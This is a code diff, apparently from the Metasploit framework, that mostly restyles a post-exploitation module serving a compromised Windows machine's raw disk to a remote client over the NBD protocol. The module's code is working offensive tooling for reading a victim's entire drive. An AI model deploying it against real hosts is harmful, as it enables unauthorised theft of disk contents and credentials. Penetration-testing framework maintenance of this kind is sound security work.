@@ -35,6 +35,11 @@ class MetasploitModule < Msf::Post
               stdapi_railgun_api
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
         }
       )
     )
@@ -51,20 +56,17 @@ class MetasploitModule < Msf::Post
     ip_addr = datastore['NBDIP']
     port = datastore['NBDPORT']
     devname = datastore['DEVICE']
-
-    invalid_handle_value = 0xFFFFFFFF
-    invalid_set_file_pointer = 0xFFFFFFFF
     fsctl_allow_extended_dasd_io = 0x00090083
     ioctl_disk_get_drive_geometry_ex = 0x000700A0
 
-    r = client.railgun.kernel32.CreateFileA(devname, "GENERIC_READ", 0x3, nil, "OPEN_EXISTING", "FILE_ATTRIBUTE_READONLY", 0)
+    r = client.railgun.kernel32.CreateFileA(devname, 'GENERIC_READ', 0x3, nil, 'OPEN_EXISTING', 'FILE_ATTRIBUTE_READONLY', 0)
     handle = r['return']
 
-    r = client.railgun.kernel32.DeviceIoControl(handle, fsctl_allow_extended_dasd_io, nil, 0, 0, 0, 4, nil)
-    ioctl = client.railgun.kernel32.DeviceIoControl(handle, ioctl_disk_get_drive_geometry_ex, "", 0, 200, 200, 4, "")
+    client.railgun.kernel32.DeviceIoControl(handle, fsctl_allow_extended_dasd_io, nil, 0, 0, 0, 4, nil)
+    ioctl = client.railgun.kernel32.DeviceIoControl(handle, ioctl_disk_get_drive_geometry_ex, '', 0, 200, 200, 4, '')
 
     if ioctl['GetLastError'] == 6
-      ioctl = client.railgun.kernel32.DeviceIoControl(handle, ioctl_disk_get_drive_geometry_ex, "", 0, 200, 200, 4, "")
+      ioctl = client.railgun.kernel32.DeviceIoControl(handle, ioctl_disk_get_drive_geometry_ex, '', 0, 200, 200, 4, '')
     end
 
     geometry = ioctl['lpOutBuffer']
@@ -73,30 +75,30 @@ class MetasploitModule < Msf::Post
     socket = Rex::Socket::TcpServer.create({ 'LocalHost' => ip_addr, 'LocalPort' => port })
     print_line("Listening on #{ip_addr}:#{port}")
     print_line("Serving #{devname} (#{disk_size} bytes)")
-    rsock = socket.accept()
-    print_line("Accepted a connection")
+    rsock = socket.accept
+    print_line('Accepted a connection')
 
     # Negotiation
     rsock.put('NBDMAGIC')
     rsock.put("\x00\x00\x42\x02\x81\x86\x12\x53")
 
-    rsock.put([disk_size].pack("Q").reverse)
-    rsock.put("\x00\x00\x00\x03")  # Read-only
+    rsock.put([disk_size].pack('Q').reverse)
+    rsock.put("\x00\x00\x00\x03") # Read-only
     rsock.put("\x00" * 124)
-    print_line("Sent negotiation")
+    print_line('Sent negotiation')
 
-    while true
+    loop do
       request = rsock.read(28)
 
       unless request
-        print_error("No data received")
+        print_error('No data received')
         break
       end
 
-      magic, request, nbd_handle, offset_n, length = request.unpack("NNa8a8N")
+      magic, request, nbd_handle, offset_n, length = request.unpack('NNa8a8N')
 
       if magic != 0x25609513
-        print_line("Wrong magic number")
+        print_line('Wrong magic number')
         break
       end
 
@@ -104,7 +106,7 @@ class MetasploitModule < Msf::Post
       when 2
         break
       when 1
-        print_line("Attempted write on a read-only nbd")
+        print_line('Attempted write on a read-only nbd')
         break
       when 0
         client.railgun.kernel32.SetFilePointer(handle, offset_n[4, 7].unpack('N')[0], offset_n[0, 4].unpack('N')[0], 0)
@@ -115,9 +117,9 @@ class MetasploitModule < Msf::Post
       end
     end
 
-    print_line("Closing")
-    rsock.close()
-    socket.close()
+    print_line('Closing')
+    rsock.close
+    socket.close
 
     client.railgun.kernel32.CloseHandle(handle)
   end
